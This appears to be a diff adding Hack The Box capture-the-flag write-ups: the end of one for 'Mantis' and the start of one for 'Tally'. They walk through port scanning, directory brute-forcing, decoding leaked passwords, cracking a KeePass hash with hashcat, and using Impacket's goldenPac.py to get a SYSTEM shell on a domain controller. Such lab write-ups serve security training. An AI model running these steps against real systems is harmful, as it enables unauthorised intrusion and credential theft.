+ [ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
+ → nmap -p- 10.10.10.52
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 19:57 GMT
+ Nmap scan report for 10.10.10.52
+ Host is up (0.037s latency).
+ Not shown: 65509 closed ports
+ PORT STATE SERVICE
+ 53/tcp open domain
+ 88/tcp open kerberos-sec
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 389/tcp open ldap
+ 445/tcp open microsoft-ds
+ 464/tcp open kpasswd5
+ 593/tcp open http-rpc-epmap
+ 636/tcp open ldapssl
+ **1337/tcp open waste**
+ 1433/tcp open ms-sql-s
+ 3268/tcp open globalcatLDAP
+ 3269/tcp open globalcatLDAPssl
+ 5722/tcp open msdfsr
+ 8080/tcp open http-proxy
+ 9389/tcp open adws
+ 49152/tcp open unknown
+ 49153/tcp open unknown
+ 49154/tcp open unknown
+ 49155/tcp open unknown
+ 49157/tcp open unknown
+ 49158/tcp open unknown
+ 49172/tcp open unknown
+ 50255/tcp open unknown
+ 57110/tcp open unknown
+ 57114/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 32.05 seconds
+
+
+And here you see the port that we missed earlier: 1337:
+
+
+
+So let's enumerate it with gobuster and a wordlist from seclists:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → sudo apt install seclists gobuster -y
+
+ [ 10.10.14.7/23 ] [ /dev/pts/6 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.52:1337/
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/02 20:09:19 Starting gobuster
+ ===============================================================
+ /secure_notes (Status: 301)
+ Progress: 145379 / 220561 (65.91%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2021/01/02 20:18:25 Finished
+ ===============================================================
+
+
+And here we found the /secure_notes directory:
+
+
+
+Let's see what's in dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
+ 1. Download OrchardCMS
+ 2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
+ 3. Launch IIS and add new website and point to Orchard CMS folder location.
+ 4. Launch browser and navigate to http://localhost:8080
+ 5. Set admin password and configure sQL server connection string.
+ 6. Add blog pages with admin user.
+
+ Credentials stored in secure format
+ OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
+ SQL Server sa credentials file namez%
+
+
+Now here we have a bit to talk about, first of all the string of text in the note name:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
+ 6d2424716c5f53405f504073735730726421
+
+
+
+
+And here we get a hex string (0-9-a-f) so let's convert it back to ascii:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
+ m$$ql_S@_P@ssW0rd!
+
+
+
+And here we have a sql password!
+
+And that binary string gives us the following password: @dm!n_P@ssW0rd!
+
+
+ @dm!n_P@ssW0rd!
+ m$$ql_S@_P@ssW0rd!
+
+
+
+The next part of this box is on port 8080 which is a blog:
+
+
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → curl 10.10.10.52:8080 2>/dev/null | grep Powered
+
+
+ Powered by [Orchard](http://www.orchardproject.net) (C) The Theme Machine 2021.
+
+
+
+
+Let's try to find the administrator page of this Orchard website using gobuster:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:8080
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.52:8080
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/02 20:47:55 Starting gobuster
+ ===============================================================
+ /archive (Status: 200)
+ /blogs (Status: 200)
+ **/admin (Status: 302)**
+ /tags (Status: 200)
+ /Archive (Status: 200)
+ /pollArchive (Status: 200)
+ /Blogs (Status: 200)
+ /newsarchive (Status: 200)
+ /news_archive (Status: 200)
+
+
+
+Let's investigate the /admin page with the credentials (admin:@dm!n_P@ssW0rd!) we found earlier:
+
+
+
+And we're logged in as admin!
+
+
+
+However this is kind of a rabbithole, therefore you see why this can be a hard box, The next step is to poke around port 1433
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → sudo apt install dbeaver -y
+
+
+
+`    
+
+And here we have found the user james' credentials:
+
+
+ james@htb.local
+ J@m3s_P@ssW0rd!
+
+
+
+## **Part 3 : Getting Root Access**
+
+Now in order to gain root access on the box we're going to use psexec:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → locate goldenPac.py
+ /usr/share/doc/python3-impacket/examples/goldenPac.py
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → cd /usr/share/doc/python3-impacket/examples/
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
+ → python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ Password:
+ [*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
+
+
+
+Once you have pasted in jame's password, wait a bit for impacket to do it's magic, and you will get root shell on the box :
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
+ → python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ Password:
+ [*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
+
+ [-] Couldn't get forest info ([Errno Connection error (htb.local:445)] timed out), continuing
+ [*] Attacking domain controller 10.10.10.52
+ [*] 10.10.10.52 found vulnerable!
+ [*] Requesting shares on 10.10.10.52.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file cviDLGQS.exe
+ [*] Opening SVCManager on 10.10.10.52.....
+ [*] Creating service dqDR on 10.10.10.52.....
+ [*] Starting service dqDR.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 6.1.7601]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>
+ C:\Windows\system32>whoami
+ nt authority\system
+
+
+
+From here type both flags:
+
+
+ C:\Windows\system32>type C:\Users\james\Desktop\user.txt
+ 8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+ C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
+ 20XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you have it!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/6.md b/Hard/6.md
new file mode 100644
index 0000000..956f02f
--- /dev/null
+++ b/Hard/6.md
@@ -0,0 +1,797 @@
+# Tally Writeup
+
+
+
+## Introduction :
+
+Tally is a hard windows box released back in November 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → sudo nmap -vvv -sTU -p- 10.10.10.59 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 139/tcp on 10.10.10.59
+ Discovered open port 135/tcp on 10.10.10.59
+ Discovered open port 21/tcp on 10.10.10.59
+ Discovered open port 80/tcp on 10.10.10.59
+ Discovered open port 445/tcp on 10.10.10.59
+ Discovered open port 47001/tcp on 10.10.10.59
+ Discovered open port 49665/tcp on 10.10.10.59
+ Discovered open port 32846/tcp on 10.10.10.59
+ Discovered open port 32844/tcp on 10.10.10.59
+ Discovered open port 49666/tcp on 10.10.10.59
+ Discovered open port 49669/tcp on 10.10.10.59
+ Discovered open port 32843/tcp on 10.10.10.59
+ Discovered open port 15567/tcp on 10.10.10.59
+ Discovered open port 81/tcp on 10.10.10.59
+ Discovered open port 49670/tcp on 10.10.10.59
+ Discovered open port 5985/tcp on 10.10.10.59
+ Discovered open port 1433/tcp on 10.10.10.59
+ Discovered open port 49668/tcp on 10.10.10.59
+ Discovered open port 808/tcp on 10.10.10.59
+ Discovered open port 49667/tcp on 10.10.10.59
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → nmap -sCV -p21,80,81,135,139,445,808,1443 10.10.10.59
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 18:12 CET
+ Nmap scan report for 10.10.10.59
+ Host is up (0.037s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-generator: Microsoft SharePoint
+ | http-ntlm-info:
+ | Target_Name: TALLY
+ | NetBIOS_Domain_Name: TALLY
+ | NetBIOS_Computer_Name: TALLY
+ | DNS_Domain_Name: TALLY
+ | DNS_Computer_Name: TALLY
+ |_ Product_Version: 10.0.14393
+ |_http-server-header: Microsoft-IIS/10.0
+ 81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Bad Request
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
+ 808/tcp open ccproxy-http?
+ 1443/tcp closed ies-lm
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -1s, deviation: 0s, median: -1s
+ | ms-sql-info:
+ | 10.10.10.59:1433:
+ | Version:
+ | name: Microsoft SQL Server 2016 RTM
+ | number: 13.00.1601.00
+ | Product: Microsoft SQL Server 2016
+ | Service pack level: RTM
+ | Post-SP patches applied: false
+ |_ TCP port: 1433
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-12-22T17:12:21
+ |_ start_date: 2020-12-22T17:08:42
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 46.79 seconds
+
+
+## **Part 2 : Getting User Access**
+
+nmap found port 80 so let's run gobuster on it:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → echo '10.10.10.59 tally.htb' >> /etc/hosts
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://tally.htb/
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://tally.htb/
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/12/22 18:18:15 Starting gobuster
+ ===============================================================
+ /_app_bin (Status: 301)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wt/forms/common.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/3082: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin/operations.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/1033: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/50: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wp/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/masterpage/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/60: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:30 [!] Get http://tally.htb/_catalogs/lt/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ /_layouts (Status: 301)
+ /_controltemplates (Status: 301)
+ /_layouts/1033 (Status: 301)
+ /_layouts/1033/avreport.htm (Status: 200)
+ /_layouts/1033/filedlg.htm (Status: 200)
+ /_layouts/1033/fontdlg.htm (Status: 200)
+ /_layouts/1033/error.htm (Status: 200)
+ /_layouts/1033/images (Status: 301)
+ /_layouts/1033/iframe.htm (Status: 200)
+ /_layouts/1033/instable.htm (Status: 200)
+ /_layouts/1033/menu.htc (Status: 200)
+ /_layouts/1033/menubar.htc (Status: 200)
+ /_layouts/1033/selcolor.htm (Status: 200)
+ /_layouts/1033/spthemes.xml (Status: 200)
+ /_layouts/1033/spthemes.xsd (Status: 200)
+ /_layouts/accessdenied.aspx (Status: 302)
+ /_layouts/addfieldfromtemplate.aspx (Status: 302)
+ /_layouts/aclinv.aspx (Status: 302)
+ /_layouts/addrole.aspx (Status: 302)
+ /_layouts/addcontenttypetolist.aspx (Status: 302)
+ /_layouts/addwrkfl.aspx (Status: 302)
+ /_layouts/adminrecyclebin.aspx (Status: 302)
+ /_layouts/approve.aspx (Status: 302)
+ /_layouts/advsetng.aspx (Status: 302)
+ /_layouts/aspxform.aspx (Status: 302)
+ /_layouts/addnavigationlinkdialog.aspx (Status: 200)
+ /_layouts/addfiletype.aspx (Status: 200)
+ /_layouts/areacachesettings.aspx (Status: 200)
+ /_layouts/areanavigationsettings.aspx (Status: 200)
+ /_layouts/addcontentsource.aspx (Status: 200)
+ /_layouts/areatemplatesettings.aspx (Status: 200)
+ /_layouts/areawelcomepage.aspx (Status: 200)
+ /_layouts/associatedgroups.aspx (Status: 302)
+ /_layouts/assocwrkfl.aspx (Status: 302)
+ /_layouts/addservernamemappings.aspx (Status: 200)
+ /_layouts/assetedithyperlink.aspx (Status: 200)
+ /_layouts/assetportalbrowser.aspx (Status: 200)
+ /_layouts/audience_defruleedit.aspx (Status: 200)
+ /_layouts/audience_edit.aspx (Status: 200)
+ /_layouts/audience_main.aspx (Status: 200)
+ /_layouts/audience_sched.aspx (Status: 200)
+ /_layouts/assetuploader.aspx (Status: 200)
+ /_layouts/audience_memberlist.aspx (Status: 200)
+ /_layouts/audience_list.aspx (Status: 200)
+ /_layouts/assetimagepicker.aspx (Status: 200)
+ /_layouts/backlinks.aspx (Status: 302)
+ /_layouts/avreport.aspx (Status: 302)
+ /_layouts/authenticate.aspx (Status: 302)
+ /_layouts/bdcadminui/addbdcapplication.aspx (Status: 200)
+ /_layouts/bdcadminui/bdcapplications.aspx (Status: 200)
+ /_layouts/auditsettings.aspx (Status: 200)
+ /_layouts/barcodeimagefromitem.aspx (Status: 200)
+ /_layouts/bdcadminui/bdcentities.aspx (Status: 200)
+ /_layouts/bdcadminui/editbdcaction.aspx (Status: 200)
+ /_layouts/audience_view.aspx (Status: 200)
+ /_layouts/bdcadminui/addbdcaction.aspx (Status: 200)
+
+
+Basically out of this garbage you had to find _layouts/15/viewlsts.aspx
+
+
+
+Into Documents there's a file called "ftp-details"
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → mv ~/Downloads/ftp-details.docx .
+ mv: cannot stat '/home/nothing/Downloads/ftp-details.docx': No such file or directory
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → ls -lash ftp-details.docx
+ 12K -rw-r--r-- 1 nothing nothing 11K Dec 22 18:23 ftp-details.docx
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → file ftp-details.docx
+ ftp-details.docx: Zip archive data, at least v1.0 to extract
+
+ [ 10.10.14.6/23 ] [ /dev/pts/3 ] [~/_HTB/Tally]
+ → lowriter ftp-details.docx
+
+
+` 
+
+So we can add that domain name to our hosts file:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/6 ] [~/_HTB/Tally]
+ → sudo vim /etc/hosts
+
+ 10.10.10.59 tally.htb tally.htb.local
+
+
+And on Site Pages you're supposed to get a file called "FinanceTeam"
+
+ 
+
+So here we're hinted towards a ftp_user account for the "intranet folder", so we could have credentials from what we gathered so far : **ftp_user:UTDRSCH53c"$6hys**. And obviously we're going to try to login via ftp since our nmap scan picked up port 21:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/8 ] [~]
+ → ftp 10.10.10.59
+ Connected to 10.10.10.59.
+ 220 Microsoft FTP Service
+ Name (10.10.10.59:nothing): ftp_user
+ 331 Password required
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-31-17 10:51PM <****DIR> From-Custodian
+ 10-01-17 10:37PM <****DIR> Intranet
+ 08-28-17 05:56PM <****DIR> Logs
+ 09-15-17 08:30PM <****DIR> To-Upload
+ 09-17-17 08:27PM <****DIR> User
+ 226 Transfer complete.
+ ftp> exit
+ 221 Goodbye.
+
+And here we get a few directories so let's just use wget to get what they contain recursively:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/8 ] [_HTB/Tally/ftp]
+ → wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@tally.htb.local'
+ --2020-12-22 23:06:07-- ftp://ftp_user:*password*@tally.htb.local/
+ => ‘tally.htb.local/.listing’
+ Resolving tally.htb.local (tally.htb.local)... 10.10.10.59
+ Connecting to tally.htb.local (tally.htb.local)|10.10.10.59|:21... connected.
+ Logging in as ftp_user ... Logged in!
+ ==> SYST ... done. ==> PWD ... done.
+ ==> TYPE I ... done. ==> CWD not needed.
+ ==> PASV ... done. ==> LIST ... done.
+
+ tally.htb.local/.listing [ <=> ] 244 --.-KB/s in 0s
+
+ ==> PASV ... done. ==> LIST ... done.
+
+ [...]
+
+
+And now let's go through what we're downloading:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
+ → du -hs tally.htb.local
+ 99M tally.htb.local
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
+ → tree tally.htb.local
+ tally.htb.local
+ ├── From-Custodian
+ │ ├── RED-528103410.log
+ │ ├── RED-528113411.log
+ │ ├── RED-528123412.log
+ │ ├── RED-528133413.log
+ │ ├── RED-5281341.log
+ │ ├── RED-528143414.log
+ │ ├── RED-528153415.log
+ │ ├── RED-528163416.log
+ │ ├── RED-528173417.log
+ │ ├── RED-528183418.log
+ │ ├── RED-528193419.log
+ │ ├── RED-528203420.log
+ │ ├── RED-528213421.log
+ │ ├── RED-528223422.log
+ │ ├── RED-528233423.log
+ │ ├── RED-5282342.log
+ │ ├── RED-528243424.log
+ │ ├── RED-528253425.log
+ │ ├── RED-528263426.log
+ │ ├── RED-528273427.log
+ │ ├── RED-528283428.log
+ │ ├── RED-528293429.log
+ │ ├── RED-528303430.log
+ │ ├── RED-528313431.log
+ │ ├── RED-528323432.log
+ │ ├── RED-528333433.log
+ │ ├── RED-5283343.log
+ │ ├── RED-528343434.log
+ │ ├── RED-528353435.log
+ │ ├── RED-528363436.log
+ │ ├── RED-528373437.log
+ │ ├── RED-528383438.log
+ │ ├── RED-528393439.log
+ │ ├── RED-528403440.log
+ │ ├── RED-528413441.log
+ │ ├── RED-528423442.log
+ │ ├── RED-528433443.log
+ │ ├── RED-5284344.log
+ │ ├── RED-528443444.log
+ │ ├── RED-528453445.log
+ │ ├── RED-528463446.log
+ │ ├── RED-528473447.log
+ │ ├── RED-528483448.log
+ │ ├── RED-528493449.log
+ │ ├── RED-528503450.log
+ │ ├── RED-5285345.log
+ │ ├── RED-5286346.log
+ │ ├── RED-5287347.log
+ │ ├── RED-5288348.log
+ │ └── RED-5289349.log
+ ├── Intranet
+ │ └── Binaries
+ │ └── Firefox Setup 44.0.2.exe
+ ├── Logs
+ │ ├── ftp_connect_8235771490510.txt
+ │ ├── ftp_connect_8235771490511.txt
+ │ ├── ftp_connect_8235771490512.txt
+ │ ├── ftp_connect_8235771490513.txt
+ │ ├── ftp_connect_8235771490514.txt
+ │ ├── ftp_connect_8235771490515.txt
+ │ ├── ftp_connect_8235771490516.txt
+ │ ├── ftp_connect_8235771490517.txt
+ │ ├── ftp_connect_8235771490518.txt
+ │ ├── ftp_connect_8235771490519.txt
+ │ ├── ftp_connect_823577149051.txt
+ │ ├── ftp_connect_8235771490520.txt
+ │ ├── ftp_connect_8235771490521.txt
+ │ ├── ftp_connect_8235771490522.txt
+ │ ├── ftp_connect_8235771490523.txt
+ │ ├── ftp_connect_8235771490524.txt
+ │ ├── ftp_connect_8235771490525.txt
+ │ ├── ftp_connect_8235771490526.txt
+ │ ├── ftp_connect_8235771490527.txt
+ │ ├── ftp_connect_8235771490528.txt
+ │ ├── ftp_connect_8235771490529.txt
+ │ ├── ftp_connect_823577149052.txt
+ │ ├── ftp_connect_8235771490530.txt
+ │ ├── ftp_connect_8235771490531.txt
+ │ ├── ftp_connect_8235771490532.txt
+ │ ├── ftp_connect_8235771490533.txt
+ │ ├── ftp_connect_8235771490534.txt
+ │ ├── ftp_connect_8235771490535.txt
+ │ ├── ftp_connect_8235771490536.txt
+ │ ├── ftp_connect_8235771490537.txt
+ │ ├── ftp_connect_8235771490538.txt
+ │ ├── ftp_connect_8235771490539.txt
+ │ ├── ftp_connect_823577149053.txt
+ │ ├── ftp_connect_8235771490540.txt
+ │ ├── ftp_connect_8235771490541.txt
+ │ ├── ftp_connect_8235771490542.txt
+ │ ├── ftp_connect_8235771490543.txt
+ │ ├── ftp_connect_8235771490544.txt
+ │ ├── ftp_connect_8235771490545.txt
+ │ ├── ftp_connect_8235771490546.txt
+ │ ├── ftp_connect_8235771490547.txt
+ │ ├── ftp_connect_8235771490548.txt
+ │ ├── ftp_connect_8235771490549.txt
+ │ ├── ftp_connect_823577149054.txt
+ │ ├── ftp_connect_8235771490550.txt
+ │ ├── ftp_connect_823577149055.txt
+ │ ├── ftp_connect_823577149056.txt
+ │ ├── ftp_connect_823577149057.txt
+ │ ├── ftp_connect_823577149058.txt
+ │ └── ftp_connect_823577149059.txt
+ ├── To-Upload
+ │ ├── employees-id_number.xlsx
+ │ └── Invoices.zip
+ └── User
+ ├── Administrator
+ │ └── New folder
+ ├── Ekta
+ │ ├── OFSI_quick_guide_flyer.pdf
+ │ └── PSAIS_1_April_2017.pdf
+ ├── Jess
+ │ └── actu8-espreadsheet-designer-datasheet.pdf
+ ├── Paul
+ │ ├── financial-list-guide.pdf
+ │ ├── financial_sanctions_guidance_august_2017.pdf
+ │ ├── Monetary_penalties_for_breaches_of_financial_sanctions.pdf
+ │ └── New folder
+ ├── Rahul
+ │ └── Mockups-Backup
+ ├── Sarah
+ │ ├── MBSASetup-x64-EN.msi
+ │ ├── notes.txt
+ │ └── Windows-KB890830-x64-V5.52.exe
+ ├── Stuart
+ │ ├── customers - Copy.csv
+ │ └── Unit4-Connect-Financials-Agenda.pdf
+ ├── Tim
+ │ ├── Files
+ │ │ ├── bonus.txt
+ │ │ ├── KeePass-2.36
+ │ │ │ ├── KeePass.chm
+ │ │ │ ├── KeePass.exe
+ │ │ │ ├── KeePass.exe.config
+ │ │ │ ├── KeePassLibC32.dll
+ │ │ │ ├── KeePassLibC64.dll
+ │ │ │ ├── KeePass.XmlSerializers.dll
+ │ │ │ ├── License.txt
+ │ │ │ ├── Plugins
+ │ │ │ ├── ShInstUtil.exe
+ │ │ │ └── XSL
+ │ │ │ ├── KDBX_Common.xsl
+ │ │ │ ├── KDBX_DetailsFull_HTML.xsl
+ │ │ │ ├── KDBX_DetailsLight_HTML.xsl
+ │ │ │ ├── KDBX_PasswordsOnly_TXT.xsl
+ │ │ │ └── KDBX_Tabular_HTML.xsl
+ │ │ └── tim.kdbx
+ │ └── Project
+ │ ├── Communications
+ │ ├── Log
+ │ │ └── do to.txt
+ │ └── Vendors
+ └── Yenwi
+ └── Archive
+
+ 27 directories, 130 files
+
+
+And here we see something interesting, there is a keepass kdbx file in User/Tim/Files/tim.kdbx, so we're going to use keepass2john to extract the hash we need:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
+ → keepass2john tim.kdbx
+ tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da
+
+
+
+Save the hash somewhere, then use hashcat to crack it:
+
+
+ hashcat -m 13400 tim.hash /usr/share/wordlists/rockyou.txt
+
+
+
+and once it finishes hashcat gives us the password we need : simplementeyo
+
+  
+
+And we have new credentials! Finance:Acc0unting, and cisco:cisco123. So first let's investigate the ACCT share the keepass file hints us towards:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
+ → sudo -i
+ [sudo] password for nothing:
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
+ → mkdir /mnt/smb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
+ → mount -t cifs -o username=Finance password=Acc0unting //10.10.10.59/ACCT /mnt/smb
+ mount: bad usage
+ Try 'mount --help' for more information.
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
+ → mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb
+ 🔐 Password for Finance@//10.10.10.59/ACCT: **********
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
+ →cd /mnt/smb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
+ → ls -l
+ total 0
+ drwxr-xr-x 2 root root 0 Sep 17 2017 Customers
+ drwxr-xr-x 2 root root 0 Aug 28 2017 Fees
+ drwxr-xr-x 2 root root 0 Aug 28 2017 Invoices
+ drwxr-xr-x 2 root root 0 Sep 17 2017 Jess
+ drwxr-xr-x 2 root root 0 Aug 28 2017 Payroll
+ drwxr-xr-x 2 root root 0 Sep 1 2017 Reports
+ drwxr-xr-x 2 root root 0 Sep 17 2017 Tax
+ drwxr-xr-x 2 root root 0 Sep 13 2017 Transactions
+ drwxr-xr-x 2 root root 0 Sep 15 2017 zz_Archived
+ drwxr-xr-x 2 root root 0 Sep 17 2017 zz_Migration
+
+
+
+So the goal here was to navigate into zz_Migration/Binaries/New\ Folder
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
+ → cd zz_Migration/Binaries/New\ Folder
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
+ → ls -l
+ total 676308
+ -rwxr-xr-x 1 root root 389188014 Sep 13 2017 crystal_reports_viewer_2016_sp04_51051980.zip
+ -rwxr-xr-x 1 root root 18159024 Sep 11 2017 Macabacus2016.exe
+ -rwxr-xr-x 1 root root 21906356 Aug 30 2017 Orchard.Web.1.7.3.zip
+ -rwxr-xr-x 1 root root 774200 Sep 17 2017 putty.exe
+ -rwxr-xr-x 1 root root 483824 Sep 15 2017 RpprtSetup.exe
+ -rwxr-xr-x 1 root root 254599112 Sep 11 2017 tableau-desktop-32bit-10-3-2.exe
